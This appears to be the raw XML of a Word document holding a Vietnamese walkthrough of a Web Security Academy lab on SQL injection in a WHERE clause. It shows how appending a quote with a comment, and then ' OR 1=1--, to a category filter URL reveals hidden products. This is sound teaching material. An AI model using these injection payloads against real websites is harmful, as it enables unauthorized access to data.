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8DEC" w14:textId="24BEEDD9" w:rsidR="00092E32" w:rsidRPr="00463495" w:rsidRDefault="00092E32" w:rsidP="00463495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FF6633"/>
          <w:kern w:val="36"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00092E32">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF6633"/>
          <w:kern w:val="36"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4676A5B5" w14:textId="5FC50A43" w:rsidR="00463495" w:rsidRPr="00092E32" w:rsidRDefault="00463495">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463495">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25278954" wp14:editId="1FBB91A0">
            <wp:extent cx="5029200" cy="272415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AE25" w14:textId="73AB54BF" w:rsidR="00092E32" w:rsidRPr="00092E32" w:rsidRDefault="00092E32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00092E32">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Yêu cầu của bài lab là hiển thị tất cả các sản phẩm của bất kỳ category, kể cả đã sản phẩm được hiện thị và không được hiển thị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDF186E" w14:textId="033C1D60" w:rsidR="00092E32" w:rsidRDefault="00092E32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00092E32">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Truy cập vào bài lab ta thấy đây là 1 website bán hàng, với từng danh mục như ‘Accessories’ ,’Clothing, shoes and accessories’, ‘Corporate gifts’ và ‘Lifestyle’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343F983C" w14:textId="15089DA9" w:rsidR="00092E32" w:rsidRDefault="00092E32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00092E32">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03E91AB1" wp14:editId="506D8809">
            <wp:extent cx="5029200" cy="272415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7062" w14:textId="4862771E" w:rsidR="0005125D" w:rsidRDefault="0005125D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Lựa chọn mục ‘Lifestyle’ và thấy thanh địa chỉ hiện URL như sau: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00A94F33">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://acba1f291e3a4993c0bd46c60095006e.web-security-academy.net/filter?category=Lifestyle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B640B38" w14:textId="77777777" w:rsidR="0005125D" w:rsidRDefault="0005125D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đổi thành SQL như sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E0F17" w14:textId="56762D71" w:rsidR="00463495" w:rsidRDefault="0005125D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SELECT * FROM category WHERE category = ’Lifestyle’ AND released = 1</w:t>
      </w:r>
      <w:r w:rsidR="00463495">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA3EF7" w14:textId="202C56DA" w:rsidR="0005125D" w:rsidRDefault="00325885">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Nghĩa là ta sẽ lấy hết những sản phẩm thuộc danh mục là Lifestyle và được hiển thị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CAA9B" w14:textId="3E8A733F" w:rsidR="00325885" w:rsidRDefault="00325885">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325885">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EC8AB4E" wp14:editId="50DCB7F8">
            <wp:extent cx="5029200" cy="272415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939" w14:textId="77777777" w:rsidR="00325885" w:rsidRDefault="00325885">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ta có thể chỉnh sửa URL thành như sau ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00325885">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>https://acba1f291e3a4993c0bd46c60095006e.web-security-academy.net/filter?category=Lifestyle%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">—’   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF561CD" w14:textId="68D5F0D1" w:rsidR="00325885" w:rsidRDefault="00325885">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đổi thành câu truy vấn như sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72845EAF" w14:textId="499A1245" w:rsidR="00325885" w:rsidRDefault="00325885">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SELECT * FROM category WHERE category = ’Lifestyle’</w:t>
      </w:r>
      <w:r w:rsidR="00964360">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>—'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> AND released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BBB5F6" w14:textId="17070B91" w:rsidR="00964360" w:rsidRDefault="00964360">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Ở trong SQL dấu – có nghĩa là comment, do đó khi ta thêm dấu – thì toàn bộ phần phía sau là AND released = 1 trở thành comment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B717DF0" w14:textId="77777777" w:rsidR="00964360" w:rsidRDefault="00964360">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Câu truy vấn trở thành: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045378D8" w14:textId="3BF938D4" w:rsidR="00964360" w:rsidRDefault="00964360">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SELECT * FROM category WHERE category = ’Lifestyle’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6305F248" w14:textId="51269743" w:rsidR="00964360" w:rsidRDefault="00771B11">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Nghĩa là lấy tất cả sản phẩm của danh mục Lifestyle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073FCAB" w14:textId="36CD5055" w:rsidR="00325885" w:rsidRDefault="00771B11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325885">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>à kiểm tra kết quả hiển thị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77693BCC" w14:textId="560778D5" w:rsidR="00325885" w:rsidRDefault="00325885">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325885">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E8F836D" wp14:editId="574A682C">
            <wp:extent cx="5029200" cy="272415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5EB7" w14:textId="24335D83" w:rsidR="00325885" w:rsidRDefault="00325885">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ta có thể thấy, phần sản phẩm đã xuất hiện thêm 1 sản phẩm mới là ‘Balance Beams’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61973D29" w14:textId="1A58D64A" w:rsidR="00771B11" w:rsidRDefault="00771B11">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tiếp theo, để hiển thị tất cả sản phẩm của bất kỳ danh mục có trong website ta thay đổi URL như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21A308" w14:textId="1D2B5C3E" w:rsidR="00771B11" w:rsidRDefault="00771B11">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00A94F33">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://acbd1f821e134f99c0144063006500b4.web-security-academy.net/filter?category=Lifestyle%27+OR+1=1--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C8E36C2" w14:textId="083C6034" w:rsidR="00771B11" w:rsidRDefault="007902BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Đổi thành câu truy vấn như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C079C" w14:textId="4D7A046B" w:rsidR="007902BC" w:rsidRDefault="007902BC" w:rsidP="007902BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SELECT * FROM category WHERE category = ’Lifestyle’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>—' AND released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F436B2F" w14:textId="4B496E42" w:rsidR="007902BC" w:rsidRDefault="007902BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Câu truy vấn này sẽ trả về tất cả sản phẩm của danh mục Lifestyle hoặc khi 1 bằng 1. Mà 1 luôn luôn bằng với 1 do đó nó sẽ trả về toàn bộ sản phẩm có trong database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B17B8FC" w14:textId="4019083F" w:rsidR="007902BC" w:rsidRPr="007902BC" w:rsidRDefault="007902BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007902BC">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B5E22FE" wp14:editId="12F3E310">
            <wp:extent cx="5029200" cy="2724150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75EC" w14:textId="25AACAD0" w:rsidR="00325885" w:rsidRPr="00092E32" w:rsidRDefault="00771B11">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Qua phép thử trên, ta thấy có thể chỉnh sửa URL để hiển thị các sản phẩm trong bất kỳ danh mục nào.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00325885" w:rsidRPr="00092E32" w:rsidSect="00922765">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="2880" w:right="2160" w:bottom="2880" w:left="21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32"/>
    <w:rsid w:val="0005125D"/>
    <w:rsid w:val="00092E32"/>
    <w:rsid w:val="000E5F37"/>
    <w:rsid w:val="00325885"/>
    <w:rsid w:val="00463495"/>
    <w:rsid w:val="00754B8A"/>
    <w:rsid w:val="00771B11"/>
    <w:rsid w:val="007902BC"/>
    <w:rsid w:val="00922765"/>
    <w:rsid w:val="00964360"/>
    <w:rsid w:val="00B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43F4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8DAE9C25-488A-45CB-9DC0-D5985A98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BC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00092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E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51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cba1f291e3a4993c0bd46c60095006e.web-security-academy.net/filter?category=Lifesty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acbd1f821e134f99c0144063006500b4.web-security-academy.net/filter?category=Lifestyle%27+OR+1=1-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F493-8F69-481D-AE5C-584AB33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Nguyễn</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hà Nguyễn</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-17T12:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-17T13:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>